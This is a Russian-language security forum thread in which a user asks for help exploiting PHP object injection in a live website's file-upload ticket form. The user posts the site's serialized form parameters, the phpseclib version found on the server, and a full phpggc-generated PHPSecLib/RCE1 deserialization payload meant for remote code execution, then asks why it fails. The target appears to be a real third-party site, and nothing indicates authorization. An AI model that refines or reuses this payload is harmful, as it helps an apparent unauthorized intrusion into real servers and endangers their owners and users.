• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

PHP Object Injection - Нужна помощь в раскрутке

wallhack

Active member
20.08.2022
34
0
BIT
26
Всем привет. Не люблю эту дырку)
У сайта параметры при загрузке файла

Код:
a:4:{s:11:"form-object";s:25:"ticket/forms:updateticket";s:13:"form-saveable";a:4:{s:8:"formName";s:13:"updateticket0";s:6:"object";O:8:"stdClass":3:{s:12:"ticketUserID";s:6:"153595";s:10:"ticketTime";s:10:"1694774649";s:11:"ticketState";s:2:"10";}s:14:"formRenderMode";b:0;s:17:"formSuccessAction";s:6:"reload";}s:13:"form-controls";a:7:{s:11:"ticketTheme";a:3:{i:0;s:6:"select";i:1;s:8:"required";i:2;b:0;}s:10:"ticketText";a:3:{i:0;s:8:"textarea";i:1;s:8:"required";i:2;b:0;}s:12:"ticketPutOff";a:3:{i:0;s:8:"checkbox";i:1;b:0;i:2;b:0;}s:10:"ticketFile";a:3:{i:0;s:4:"file";i:1;b:0;i:2;b:0;}s:6:"action";a:3:{i:0;s:6:"hidden";i:1;b:0;i:2;b:0;}s:9:"subjectID";a:3:{i:0;s:6:"hidden";i:1;b:0;i:2;b:0;}s:6:"ticket";a:3:{i:0;s:6:"submit";i:1;b:0;i:2;b:0;}}s:11:"live-object";a:3:{s:6:"object";s:13:"ticket:ticket";s:2:"id";i:0;s:4:"info";a:0:{}}}

Нашел phpseclib/phpseclib": "^2.0.31" В /vendor/composer/installed.json
Сгенерил нагрузку через GitHub - ambionics/phpggc: PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.

./phpggc PHPSecLib/RCE1 'sleep(10);'

Код:
a:1:{i:0;O:18:"phpseclib\Net\SSH1":2:{s:6:"bitmap";i:1;s:6:"crypto";O:19:"phpseclib\Crypt\AES":8:{s:6:"bitmap";i:1;s:6:"crypto";i:1;s:10:"block_size";N;s:12:"inline_crypt";a:2:{i:0;O:25:"phpseclib\Crypt\TripleDES":6:{s:10:"block_size";s:38:"1){}}}; ob_clean();sleep(10);die(); ?>";s:12:"inline_crypt";N;s:16:"use_inline_crypt";i:1;s:7:"changed";i:0;s:6:"engine";i:1;s:4:"mode";i:1;}i:1;s:26:"_createInlineCryptFunction";}s:16:"use_inline_crypt";i:1;s:7:"changed";i:0;s:6:"engine";i:1;s:4:"mode";i:1;}}}

Вставил что то не фурычит
Правильно сделал?
А то я думаю это у меня руки кривые, или библиотеке нет такой
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!